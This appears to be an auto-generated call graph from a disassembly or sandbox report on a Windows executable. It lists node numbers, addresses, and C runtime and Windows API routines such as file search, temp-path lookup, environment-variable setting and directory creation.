16009 7ff7fbddaa3c 16004->16009 16007 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16008 7ff7fbddee14 16007->16008 16010 7ff7fbddaa53 16009->16010 16011 7ff7fbddaa49 16009->16011 16012 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16010->16012 16011->16010 16016 7ff7fbddaa6e 16011->16016 16013 7ff7fbddaa5a 16012->16013 16014 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16013->16014 16015 7ff7fbddaa66 16014->16015 16015->15999 16015->16007 16016->16015 16017 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16016->16017 16017->16013 16051 7ff7fbde471c 16018->16051 16022 7ff7fbdde96c 16023 7ff7fbdde9c1 16022->16023 16024 7ff7fbdde98c 16022->16024 16027 7ff7fbdde970 16022->16027 16104 7ff7fbdde4b0 16023->16104 16100 7ff7fbdde76c 16024->16100 16027->15999 16029 7ff7fbde471c 38 API calls 16028->16029 16030 7ff7fbdde6de 16029->16030 16031 7ff7fbde4164 37 API calls 16030->16031 16032 7ff7fbdde72e 16031->16032 16033 7ff7fbdde732 16032->16033 16034 7ff7fbdde76c 45 API calls 16032->16034 16033->15999 16034->16033 16036 7ff7fbde471c 38 API calls 16035->16036 16037 7ff7fbdde3ff 16036->16037 16038 7ff7fbde4164 37 API calls 16037->16038 16039 7ff7fbdde457 16038->16039 16040 7ff7fbdde45b 16039->16040 16041 7ff7fbdde4b0 45 API calls 16039->16041 16040->15999 16041->16040 16043 7ff7fbdde094 16042->16043 16044 7ff7fbdde061 16042->16044 16046 7ff7fbdde0ac 16043->16046 16048 7ff7fbdde12d 16043->16048 16045 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16044->16045 16050 7ff7fbdde08d memcpy_s 16045->16050 16047 7ff7fbdde3b4 46 API calls 16046->16047 16047->16050 16049 7ff7fbdd4900 45 API calls 16048->16049 16048->16050 16049->16050 16050->15999 16052 7ff7fbde476f fegetenv 16051->16052 16053 7ff7fbde867c 37 API calls 16052->16053 16056 7ff7fbde47c2 16053->16056 16054 7ff7fbde47ef 16058 7ff7fbddaa3c __std_exception_copy 37 API calls 16054->16058 16055 7ff7fbde48b2 16057 7ff7fbde867c 37 API calls 16055->16057 16056->16055 16061 7ff7fbde488c 16056->16061 16062 7ff7fbde47dd 16056->16062 16059 7ff7fbde48dc 16057->16059 16060 7ff7fbde486d 16058->16060 16063 7ff7fbde867c 37 API calls 16059->16063 16065 7ff7fbde5994 16060->16065 16070 7ff7fbde4875 16060->16070 16066 7ff7fbddaa3c __std_exception_copy 37 API calls 16061->16066 16062->16054 16062->16055 16064 7ff7fbde48ed 16063->16064 16067 7ff7fbde8870 20 API calls 16064->16067 16068 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16065->16068 16066->16060 16078 7ff7fbde4956 memcpy_s 16067->16078 16069 7ff7fbde59a9 16068->16069 16071 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16070->16071 16072 7ff7fbdde911 16071->16072 16096 7ff7fbde4164 16072->16096 16073 7ff7fbde4cff memcpy_s 16074 7ff7fbde4997 memcpy_s 16084 7ff7fbde4df3 memcpy_s 16074->16084 16088 7ff7fbde52db memcpy_s 16074->16088 16075 7ff7fbde503f 16076 7ff7fbde4280 37 API calls 16075->16076 16085 7ff7fbde5757 16076->16085 16077 7ff7fbde4feb 16077->16075 16080 7ff7fbde59ac memcpy_s 37 API calls 16077->16080 16078->16073 16078->16074 16081 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16078->16081 16079 7ff7fbde57b2 16087 7ff7fbde5938 16079->16087 16092 7ff7fbde4280 37 API calls 16079->16092 16094 7ff7fbde59ac memcpy_s 37 API calls 16079->16094 16080->16075 16082 7ff7fbde4dd0 16081->16082 16083 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16082->16083 16083->16074 16084->16077 16091 7ff7fbdd54c4 11 API calls _wfindfirst32i64 16084->16091 16093 7ff7fbddaea4 37 API calls _invalid_parameter_noinfo 16084->16093 16085->16079 16086 7ff7fbde59ac memcpy_s 37 API calls 16085->16086 16086->16079 16089 7ff7fbde867c 37 API calls 16087->16089 16088->16075 16088->16077 16090 7ff7fbdd54c4 11 API calls _wfindfirst32i64 16088->16090 16095 7ff7fbddaea4 37 API calls _invalid_parameter_noinfo 16088->16095 16089->16070 16090->16088 16091->16084 16092->16079 16093->16084 16094->16079 16095->16088 16097 7ff7fbde4183 16096->16097 16098 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16097->16098 16099 7ff7fbde41ae memcpy_s 16097->16099 16098->16099 16099->16022 16101 7ff7fbdde798 memcpy_s 16100->16101 16102 7ff7fbdd4900 45 API calls 16101->16102 16103 7ff7fbdde852 memcpy_s 16101->16103 16102->16103 16103->16027 16105 7ff7fbdde4eb 16104->16105 16110 7ff7fbdde538 memcpy_s 16104->16110 16106 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16105->16106 16107 7ff7fbdde517 16106->16107 16107->16027 16108 7ff7fbdde5a3 16109 7ff7fbddaa3c __std_exception_copy 37 API calls 16108->16109 16114 7ff7fbdde5e5 memcpy_s 16109->16114 16110->16108 16111 7ff7fbdd4900 45 API calls 16110->16111 16111->16108 16112 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16113 7ff7fbdde690 16112->16113 16114->16112 16116 7ff7fbde04ec WideCharToMultiByte 16115->16116 16119 7ff7fbdd0e93 16118->16119 16120 7ff7fbdd0e81 16118->16120 16123 7ff7fbdd0ea0 16119->16123 16126 7ff7fbdd0edd 16119->16126 16121 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16120->16121 16122 7ff7fbdd0e86 16121->16122 16124 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16122->16124 16125 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16123->16125 16132 7ff7fbdd0e91 16124->16132 16125->16132 16127 7ff7fbdd0f86 16126->16127 16128 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16126->16128 16129 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16127->16129 16127->16132 16130 7ff7fbdd0f7b 16128->16130 16131 7ff7fbdd1030 16129->16131 16133 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16130->16133 16134 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16131->16134 16132->15861 16133->16127 16134->16132 16136 7ff7fbdddf91 16135->16136 16137 7ff7fbdd493f 16135->16137 16136->16137 16143 7ff7fbde3974 16136->16143 16139 7ff7fbdddfe4 16137->16139 16140 7ff7fbdd494f 16139->16140 16141 7ff7fbdddffd 16139->16141 16140->15861 16141->16140 16187 7ff7fbde2cc0 16141->16187 16155 7ff7fbddb710 GetLastError 16143->16155 16146 7ff7fbde39ce 16146->16137 16156 7ff7fbddb734 FlsGetValue 16155->16156 16157 7ff7fbddb751 FlsSetValue 16155->16157 16158 7ff7fbddb74b 16156->16158 16174 7ff7fbddb741 16156->16174 16159 7ff7fbddb763 16157->16159 16157->16174 16158->16157 16160 7ff7fbddf158 _wfindfirst32i64 11 API calls 16159->16160 16162 7ff7fbddb772 16160->16162 16161 7ff7fbddb7bd SetLastError 16163 7ff7fbddb7dd 16161->16163 16164 7ff7fbddb7ca 16161->16164 16165 7ff7fbddb790 FlsSetValue 16162->16165 16166 7ff7fbddb780 FlsSetValue 16162->16166 16178 7ff7fbddaa9c 16163->16178 16164->16146 16177 7ff7fbde0cb8 EnterCriticalSection 16164->16177 16170 7ff7fbddb79c FlsSetValue 16165->16170 16171 7ff7fbddb7ae 16165->16171 16169 7ff7fbddb789 16166->16169 16172 7ff7fbddaf0c __free_lconv_num 11 API calls 16169->16172 16170->16169 16173 7ff7fbddb4b8 _wfindfirst32i64 11 API calls 16171->16173 16172->16174 16175 7ff7fbddb7b6 16173->16175 16174->16161 16176 7ff7fbddaf0c __free_lconv_num 11 API calls 16175->16176 16176->16161 16179 7ff7fbde3cc0 __CxxCallCatchBlock EnterCriticalSection LeaveCriticalSection 16178->16179 16180 7ff7fbddaaa5 16179->16180 16181 7ff7fbddaab4 16180->16181 16182 7ff7fbde3d10 __CxxCallCatchBlock 44 API calls 16180->16182 16183 7ff7fbddaabd IsProcessorFeaturePresent 16181->16183 16184 7ff7fbddaae7 __CxxCallCatchBlock 16181->16184 16182->16181 16185 7ff7fbddaacc 16183->16185 16186 7ff7fbddabd8 _wfindfirst32i64 14 API calls 16185->16186 16186->16184 16188 7ff7fbddb710 __CxxCallCatchBlock 45 API calls 16187->16188 16189 7ff7fbde2cc9 16188->16189 16197 7ff7fbdd536c EnterCriticalSection 16190->16197 16199 7ff7fbdc28ac 16198->16199 16200 7ff7fbdd4ac4 49 API calls 16199->16200 16201 7ff7fbdc28fd 16200->16201 16202 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16201->16202 16203 7ff7fbdc2902 16202->16203 16217 7ff7fbdd54e4 16203->16217 16206 7ff7fbdc1ef0 49 API calls 16207 7ff7fbdc2931 memcpy_s 16206->16207 16208 7ff7fbdc8ae0 57 API calls 16207->16208 16209 7ff7fbdc2966 16208->16209 16210 7ff7fbdc29a3 MessageBoxA 16209->16210 16211 7ff7fbdc296b 16209->16211 16213 7ff7fbdc29bd 16210->16213 16212 7ff7fbdc8ae0 57 API calls 16211->16212 16214 7ff7fbdc2985 MessageBoxW 16212->16214 16215 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16213->16215 16214->16213 16216 7ff7fbdc29cd 16215->16216 16216->15547 16218 7ff7fbddb888 _wfindfirst32i64 11 API calls 16217->16218 16219 7ff7fbdd54fb 16218->16219 16220 7ff7fbdc2909 16219->16220 16221 7ff7fbddf158 _wfindfirst32i64 11 API calls 16219->16221 16223 7ff7fbdd553b 16219->16223 16220->16206 16222 7ff7fbdd5530 16221->16222 16224 7ff7fbddaf0c __free_lconv_num 11 API calls 16222->16224 16223->16220 16229 7ff7fbddf828 16223->16229 16224->16223 16227 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16228 7ff7fbdd5580 16227->16228 16230 7ff7fbddf845 16229->16230 16232 7ff7fbdd5561 16230->16232 16234 7ff7fbddf84a 16230->16234 16236 7ff7fbddf894 16230->16236 16231 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16233 7ff7fbddf854 16231->16233 16232->16220 16232->16227 16235 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16233->16235 16234->16231 16234->16232 16235->16232 16236->16232 16237 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16236->16237 16237->16233 16239 7ff7fbdc8c14 WideCharToMultiByte 16238->16239 16240 7ff7fbdc8c82 WideCharToMultiByte 16238->16240 16242 7ff7fbdc8c3e 16239->16242 16246 7ff7fbdc8c55 16239->16246 16241 7ff7fbdc8caf 16240->16241 16244 7ff7fbdc3f25 16240->16244 16243 7ff7fbdc29e0 57 API calls 16241->16243 16245 7ff7fbdc29e0 57 API calls 16242->16245 16243->16244 16244->15556 16244->15558 16245->16244 16246->16240 16247 7ff7fbdc8c6b 16246->16247 16248 7ff7fbdc29e0 57 API calls 16247->16248 16248->16244 16250 7ff7fbdc7bde 16249->16250 16251 7ff7fbdda9b3 16249->16251 16250->15574 16251->16250 16252 7ff7fbddaa3c __std_exception_copy 37 API calls 16251->16252 16253 7ff7fbdda9e0 16252->16253 16253->16250 16254 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16253->16254 16255 7ff7fbddaa10 16254->16255 16257 7ff7fbdc3fd0 116 API calls 16256->16257 16258 7ff7fbdc1ad6 16257->16258 16259 7ff7fbdc1c84 16258->16259 16261 7ff7fbdc82b0 83 API calls 16258->16261 16260 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16259->16260 16262 7ff7fbdc1c98 16260->16262 16263 7ff7fbdc1b0e 16261->16263 16262->15584 16289 7ff7fbdc3e40 16262->16289 16288 7ff7fbdc1b3f 16263->16288 16295 7ff7fbdd0814 16263->16295 16265 7ff7fbdd018c 74 API calls 16265->16259 16266 7ff7fbdc1b28 16267 7ff7fbdc1b44 16266->16267 16268 7ff7fbdc1b2c 16266->16268 16299 7ff7fbdd04dc 16267->16299 16270 7ff7fbdc2890 59 API calls 16268->16270 16270->16288 16272 7ff7fbdc1b5f 16274 7ff7fbdc2890 59 API calls 16272->16274 16273 7ff7fbdc1b77 16275 7ff7fbdd0814 73 API calls 16273->16275 16274->16288 16276 7ff7fbdc1bc4 16275->16276 16277 7ff7fbdc1bd6 16276->16277 16278 7ff7fbdc1bee 16276->16278 16279 7ff7fbdc2890 59 API calls 16277->16279 16280 7ff7fbdd04dc _fread_nolock 53 API calls 16278->16280 16279->16288 16281 7ff7fbdc1c03 16280->16281 16282 7ff7fbdc1c09 16281->16282 16283 7ff7fbdc1c1e 16281->16283 16284 7ff7fbdc2890 59 API calls 16282->16284 16302 7ff7fbdd0250 16283->16302 16284->16288 16287 7ff7fbdc2b30 59 API calls 16287->16288 16288->16265 16290 7ff7fbdc1ef0 49 API calls 16289->16290 16291 7ff7fbdc3e5d 16290->16291 16291->15594 16293 7ff7fbdc1ef0 49 API calls 16292->16293 16294 7ff7fbdc4080 16293->16294 16294->15584 16296 7ff7fbdd0844 16295->16296 16308 7ff7fbdd05a4 16296->16308 16298 7ff7fbdd085d 16298->16266 16320 7ff7fbdd04fc 16299->16320 16303 7ff7fbdc1c32 16302->16303 16304 7ff7fbdd0259 16302->16304 16303->16287 16303->16288 16305 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16304->16305 16306 7ff7fbdd025e 16305->16306 16307 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16306->16307 16307->16303 16309 7ff7fbdd060e 16308->16309 16310 7ff7fbdd05ce 16308->16310 16309->16310 16311 7ff7fbdd061a 16309->16311 16312 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16310->16312 16319 7ff7fbdd536c EnterCriticalSection 16311->16319 16314 7ff7fbdd05f5 16312->16314 16314->16298 16321 7ff7fbdd0526 16320->16321 16332 7ff7fbdc1b59 16320->16332 16322 7ff7fbdd0572 16321->16322 16324 7ff7fbdd0535 memcpy_s 16321->16324 16321->16332 16333 7ff7fbdd536c EnterCriticalSection 16322->16333 16325 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16324->16325 16327 7ff7fbdd054a 16325->16327 16329 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16327->16329 16329->16332 16332->16272 16332->16273 16335 7ff7fbdc7966 16334->16335 16336 7ff7fbdc798a 16335->16336 16337 7ff7fbdc79dd GetTempPathW 16335->16337 16339 7ff7fbdc7b60 61 API calls 16336->16339 16338 7ff7fbdc79f2 16337->16338 16373 7ff7fbdc2830 16338->16373 16340 7ff7fbdc7996 16339->16340 16397 7ff7fbdc7420 16340->16397 16346 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16348 7ff7fbdc154f 16346->16348 16347 7ff7fbdc79bc __std_exception_copy 16347->16337 16352 7ff7fbdc79ca 16347->16352 16348->15600 16348->15604 16350 7ff7fbdc7a0b __std_exception_copy 16351 7ff7fbdc7ab6 16350->16351 16356 7ff7fbdc7a41 16350->16356 16377 7ff7fbdd8aa4 16350->16377 16380 7ff7fbdc8950 16350->16380 16354 7ff7fbdc8bf0 59 API calls 16351->16354 16353 7ff7fbdc2b30 59 API calls 16352->16353 16355 7ff7fbdc79d6 16353->16355 16357 7ff7fbdc7ac7 __std_exception_copy 16354->16357 16371 7ff7fbdc7a7a __std_exception_copy 16355->16371 16358 7ff7fbdc8ae0 57 API calls 16356->16358 16356->16371 16359 7ff7fbdc8ae0 57 API calls 16357->16359 16357->16371 16360 7ff7fbdc7a57 16358->16360 16363 7ff7fbdc7ae5 16359->16363 16361 7ff7fbdc7a99 SetEnvironmentVariableW 16360->16361 16362 7ff7fbdc7a5c 16360->16362 16361->16371 16364 7ff7fbdc8ae0 57 API calls 16362->16364 16365 7ff7fbdc7aea 16363->16365 16366 7ff7fbdc7b1d SetEnvironmentVariableW 16363->16366 16367 7ff7fbdc7a6c 16364->16367 16368 7ff7fbdc8ae0 57 API calls 16365->16368 16366->16371 16369 7ff7fbdd7dec 38 API calls 16367->16369 16370 7ff7fbdc7afa 16368->16370 16369->16371 16372 7ff7fbdd7dec 38 API calls 16370->16372 16371->16346 16372->16371 16374 7ff7fbdc2855 16373->16374 16431 7ff7fbdd4d18 16374->16431 16625 7ff7fbdd86d0 16377->16625 16381 7ff7fbdcbc60 16380->16381 16382 7ff7fbdc8960 GetCurrentProcess OpenProcessToken 16381->16382 16383 7ff7fbdc8a21 __std_exception_copy 16382->16383 16384 7ff7fbdc89ab GetTokenInformation 16382->16384 16387 7ff7fbdc8a34 CloseHandle 16383->16387 16388 7ff7fbdc8a3a 16383->16388 16385 7ff7fbdc89cd GetLastError 16384->16385 16386 7ff7fbdc89d8 16384->16386 16385->16383 16385->16386 16386->16383 16389 7ff7fbdc89ee GetTokenInformation 16386->16389 16387->16388 16756 7ff7fbdc8650 16388->16756 16389->16383 16391 7ff7fbdc8a14 ConvertSidToStringSidW 16389->16391 16391->16383 16393 7ff7fbdc8a96 CreateDirectoryW 16394 7ff7fbdc8aae 16393->16394 16395 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16394->16395 16396 7ff7fbdc8ac3 16395->16396 16396->16350 16398 7ff7fbdc742c 16397->16398 16399 7ff7fbdc8ae0 57 API calls 16398->16399 16400 7ff7fbdc744e 16399->16400 16401 7ff7fbdc7456 16400->16401 16402 7ff7fbdc7469 ExpandEnvironmentStringsW 16400->16402 16403 7ff7fbdc2b30 59 API calls 16401->16403 16404 7ff7fbdc748f __std_exception_copy 16402->16404 16405 7ff7fbdc7462 16403->16405 16406 7ff7fbdc74a6 16404->16406 16407 7ff7fbdc7493 16404->16407 16408 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16405->16408 16411 7ff7fbdc74c0 16406->16411 16412 7ff7fbdc74b4 16406->16412 16409 7ff7fbdc2b30 59 API calls 16407->16409 16410 7ff7fbdc7588 16408->16410 16409->16405 16410->16371 16421 7ff7fbdd7dec 16410->16421 16767 7ff7fbdd6328 16411->16767 16760 7ff7fbdd79a4 16412->16760 16415 7ff7fbdc74be 16416 7ff7fbdc74da 16415->16416 16419 7ff7fbdc74ed memcpy_s 16415->16419 16417 7ff7fbdc2b30 59 API calls 16416->16417 16417->16405 16418 7ff7fbdc7562 CreateDirectoryW 16418->16405 16419->16418 16420 7ff7fbdc753c CreateDirectoryW 16419->16420 16420->16419 16422 7ff7fbdd7e0c 16421->16422 16423 7ff7fbdd7df9 16421->16423 16868 7ff7fbdd7a70 16422->16868 16424 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16423->16424 16426 7ff7fbdd7dfe 16424->16426 16427 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16426->16427 16429 7ff7fbdd7e0a 16427->16429 16429->16347 16432 7ff7fbdd4d72 16431->16432 16433 7ff7fbdd4d97 16432->16433 16434 7ff7fbdd4dd3 16432->16434 16435 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16433->16435 16449 7ff7fbdd30d0 16434->16449 16437 7ff7fbdd4dc1 16435->16437 16440 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16437->16440 16438 7ff7fbdd4eb4 16439 7ff7fbddaf0c __free_lconv_num 11 API calls 16438->16439 16439->16437 16442 7ff7fbdc2874 16440->16442 16442->16350 16443 7ff7fbdd4e89 16447 7ff7fbddaf0c __free_lconv_num 11 API calls 16443->16447 16444 7ff7fbdd4eda 16444->16438 16446 7ff7fbdd4ee4 16444->16446 16445 7ff7fbdd4e80 16445->16438 16445->16443 16448 7ff7fbddaf0c __free_lconv_num 11 API calls 16446->16448 16447->16437 16448->16437 16450 7ff7fbdd310e 16449->16450 16455 7ff7fbdd30fe 16449->16455 16451 7ff7fbdd3117 16450->16451 16456 7ff7fbdd3145 16450->16456 16454 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16451->16454 16452 7ff7fbdd313d 16452->16438 16452->16443 16452->16444 16452->16445 16453 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16453->16452 16454->16452 16455->16453 16456->16452 16456->16455 16460 7ff7fbdd3ae4 16456->16460 16493 7ff7fbdd3530 16456->16493 16530 7ff7fbdd2cc0 16456->16530 16461 7ff7fbdd3b26 16460->16461 16462 7ff7fbdd3b97 16460->16462 16465 7ff7fbdd3bc1 16461->16465 16466 7ff7fbdd3b2c 16461->16466 16463 7ff7fbdd3bf0 16462->16463 16464 7ff7fbdd3b9c 16462->16464 16471 7ff7fbdd3c07 16463->16471 16473 7ff7fbdd3bfa 16463->16473 16478 7ff7fbdd3bff 16463->16478 16469 7ff7fbdd3bd1 16464->16469 16470 7ff7fbdd3b9e 16464->16470 16549 7ff7fbdd1e94 16465->16549 16467 7ff7fbdd3b60 16466->16467 16468 7ff7fbdd3b31 16466->16468 16474 7ff7fbdd3b37 16467->16474 16467->16478 16468->16471 16468->16474 16556 7ff7fbdd1a84 16469->16556 16472 7ff7fbdd3b40 16470->16472 16482 7ff7fbdd3bad 16470->16482 16563 7ff7fbdd47ec 16471->16563 16491 7ff7fbdd3c30 16472->16491 16533 7ff7fbdd4298 16472->16533 16473->16465 16473->16478 16474->16472 16481 7ff7fbdd3b72 16474->16481 16489 7ff7fbdd3b5b 16474->16489 16478->16491 16567 7ff7fbdd22a4 16478->16567 16481->16491 16543 7ff7fbdd45d4 16481->16543 16482->16465 16483 7ff7fbdd3bb2 16482->16483 16487 7ff7fbdd4698 37 API calls 16483->16487 16483->16491 16485 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16486 7ff7fbdd3f2a 16485->16486 16486->16456 16487->16489 16488 7ff7fbdd4900 45 API calls 16492 7ff7fbdd3e1c 16488->16492 16489->16488 16489->16491 16489->16492 16491->16485 16492->16491 16574 7ff7fbddefc8 16492->16574 16494 7ff7fbdd3554 16493->16494 16495 7ff7fbdd353e 16493->16495 16496 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16494->16496 16497 7ff7fbdd3594 16494->16497 16495->16497 16498 7ff7fbdd3b26 16495->16498 16499 7ff7fbdd3b97 16495->16499 16496->16497 16497->16456 16502 7ff7fbdd3bc1 16498->16502 16503 7ff7fbdd3b2c 16498->16503 16500 7ff7fbdd3bf0 16499->16500 16501 7ff7fbdd3b9c 16499->16501 16508 7ff7fbdd3c07 16500->16508 16510 7ff7fbdd3bfa 16500->16510 16515 7ff7fbdd3bff 16500->16515 16506 7ff7fbdd3bd1 16501->16506 16507 7ff7fbdd3b9e 16501->16507 16512 7ff7fbdd1e94 38 API calls 16502->16512 16504 7ff7fbdd3b60 16503->16504 16505 7ff7fbdd3b31 16503->16505 16511 7ff7fbdd3b37 16504->16511 16504->16515 16505->16508 16505->16511 16513 7ff7fbdd1a84 38 API calls 16506->16513 16509 7ff7fbdd3b40 16507->16509 16520 7ff7fbdd3bad 16507->16520 16517 7ff7fbdd47ec 45 API calls 16508->16517 16514 7ff7fbdd4298 47 API calls 16509->16514 16529 7ff7fbdd3c30 16509->16529 16510->16502 16510->16515 16511->16509 16516 7ff7fbdd3b5b 16511->16516 16518 7ff7fbdd3b72 16511->16518 16512->16516 16513->16516 16514->16516 16519 7ff7fbdd22a4 38 API calls 16515->16519 16515->16529 16526 7ff7fbdd4900 45 API calls 16516->16526 16528 7ff7fbdd3e1c 16516->16528 16516->16529 16517->16516 16521 7ff7fbdd45d4 46 API calls 16518->16521 16518->16529 16519->16516 16520->16502 16522 7ff7fbdd3bb2 16520->16522 16521->16516 16525 7ff7fbdd4698 37 API calls 16522->16525 16522->16529 16523 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16524 7ff7fbdd3f2a 16523->16524 16524->16456 16525->16516 16526->16528 16527 7ff7fbddefc8 46 API calls 16527->16528 16528->16527 16528->16529 16529->16523 16608 7ff7fbdd1108 16530->16608 16534 7ff7fbdd42be 16533->16534 16535 7ff7fbdd0cc0 12 API calls 16534->16535 16536 7ff7fbdd430e 16535->16536 16537 7ff7fbddeb30 46 API calls 16536->16537 16538 7ff7fbdd43e1 16537->16538 16539 7ff7fbdd4900 45 API calls 16538->16539 16541 7ff7fbdd4403 16538->16541 16539->16541 16540 7ff7fbdd4900 45 API calls 16542 7ff7fbdd4491 16540->16542 16541->16540 16541->16541 16541->16542 16542->16489 16545 7ff7fbdd4609 16543->16545 16544 7ff7fbdd464e 16544->16489 16545->16544 16546 7ff7fbdd4627 16545->16546 16548 7ff7fbdd4900 45 API calls 16545->16548 16547 7ff7fbddefc8 46 API calls 16546->16547 16547->16544 16548->16546 16550 7ff7fbdd1ec7 16549->16550 16551 7ff7fbdd1ef6 16550->16551 16554 7ff7fbdd1fb3 16550->16554 16552 7ff7fbdd1f33 16551->16552 16586 7ff7fbdd0d68 16551->16586 16552->16489 16555 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16554->16555 16555->16552 16557 7ff7fbdd1ab7 16556->16557 16558 7ff7fbdd1ae6 16557->16558 16560 7ff7fbdd1ba3 16557->16560 16559 7ff7fbdd0d68 12 API calls 16558->16559 16562 7ff7fbdd1b23 16558->16562 16559->16562 16561 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16560->16561 16561->16562 16562->16489 16564 7ff7fbdd482f 16563->16564 16566 7ff7fbdd4833 __crtLCMapStringW 16564->16566 16594 7ff7fbdd4888 16564->16594 16566->16489 16568 7ff7fbdd22d7 16567->16568 16569 7ff7fbdd2306 16568->16569 16571 7ff7fbdd23c3 16568->16571 16570 7ff7fbdd0d68 12 API calls 16569->16570 16572 7ff7fbdd2343 16569->16572 16570->16572 16573 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16571->16573 16572->16489 16573->16572 16575 7ff7fbddeff9 16574->16575 16584 7ff7fbddf007 16574->16584 16576 7ff7fbddf027 16575->16576 16577 7ff7fbdd4900 45 API calls 16575->16577 16575->16584 16578 7ff7fbddf05f 16576->16578 16579 7ff7fbddf038 16576->16579 16577->16576 16581 7ff7fbddf0ea 16578->16581 16582 7ff7fbddf089 16578->16582 16578->16584 16598 7ff7fbde0a80 16579->16598 16583 7ff7fbddfc00 _fread_nolock MultiByteToWideChar 16581->16583 16582->16584 16601 7ff7fbddfc00 16582->16601 16583->16584 16584->16492 16587 7ff7fbdd0d9f 16586->16587 16593 7ff7fbdd0d8e 16586->16593 16588 7ff7fbdddbbc _fread_nolock 12 API calls 16587->16588 16587->16593 16589 7ff7fbdd0dd0 16588->16589 16590 7ff7fbddaf0c __free_lconv_num 11 API calls 16589->16590 16592 7ff7fbdd0de4 16589->16592 16590->16592 16591 7ff7fbddaf0c __free_lconv_num 11 API calls 16591->16593 16592->16591 16593->16552 16595 7ff7fbdd48a6 16594->16595 16596 7ff7fbdd48ae 16594->16596 16597 7ff7fbdd4900 45 API calls 16595->16597 16596->16566 16597->16596 16604 7ff7fbde76e0 16598->16604 16603 7ff7fbddfc09 MultiByteToWideChar 16601->16603 16607 7ff7fbde7744 16604->16607 16605 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 16606 7ff7fbde0a9d 16605->16606 16606->16584 16607->16605 16609 7ff7fbdd114f 16608->16609 16610 7ff7fbdd113d 16608->16610 16613 7ff7fbdd115d 16609->16613 16616 7ff7fbdd1199 16609->16616 16611 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16610->16611 16612 7ff7fbdd1142 16611->16612 16614 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16612->16614 16615 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 16613->16615 16620 7ff7fbdd114d 16614->16620 16615->16620 16617 7ff7fbdd1515 16616->16617 16619 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16616->16619 16618 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16617->16618 16617->16620 16621 7ff7fbdd17a9 16618->16621 16622 7ff7fbdd150a 16619->16622 16620->16456 16623 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16621->16623 16624 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16622->16624 16623->16620 16624->16617 16666 7ff7fbde1bc8 16625->16666 16725 7ff7fbde1940 16666->16725 16746 7ff7fbde0cb8 EnterCriticalSection 16725->16746 16757 7ff7fbdc8675 16756->16757 16758 7ff7fbdd4d18 48 API calls 16757->16758 16759 7ff7fbdc8698 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 16758->16759 16759->16393 16759->16394 16761 7ff7fbdd79c2 16760->16761 16764 7ff7fbdd79f5 16760->16764 16761->16764 16779 7ff7fbde0e54 16761->16779 16764->16415 16765 7ff7fbddaec4 _wfindfirst32i64 17 API calls 16766 7ff7fbdd7a25 16765->16766 16768 7ff7fbdd6344 16767->16768 16769 7ff7fbdd63b2 16767->16769 16768->16769 16771 7ff7fbdd6349 16768->16771 16813 7ff7fbde04a0 16769->16813 16772 7ff7fbdd6361 16771->16772 16773 7ff7fbdd637e 16771->16773 16788 7ff7fbdd60f8 GetFullPathNameW 16772->16788 16796 7ff7fbdd616c GetFullPathNameW 16773->16796 16778 7ff7fbdd6376 __std_exception_copy 16778->16415 16780 7ff7fbde0e61 16779->16780 16781 7ff7fbde0e6b 16779->16781 16780->16781 16786 7ff7fbde0e87 16780->16786 16782 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16781->16782 16783 7ff7fbde0e73 16782->16783 16785 7ff7fbddaea4 _invalid_parameter_noinfo 37 API calls 16783->16785 16784 7ff7fbdd79f1 16784->16764 16784->16765 16785->16784 16786->16784 16787 7ff7fbdd54c4 _wfindfirst32i64 11 API calls 16786->16787 16787->16783 16789 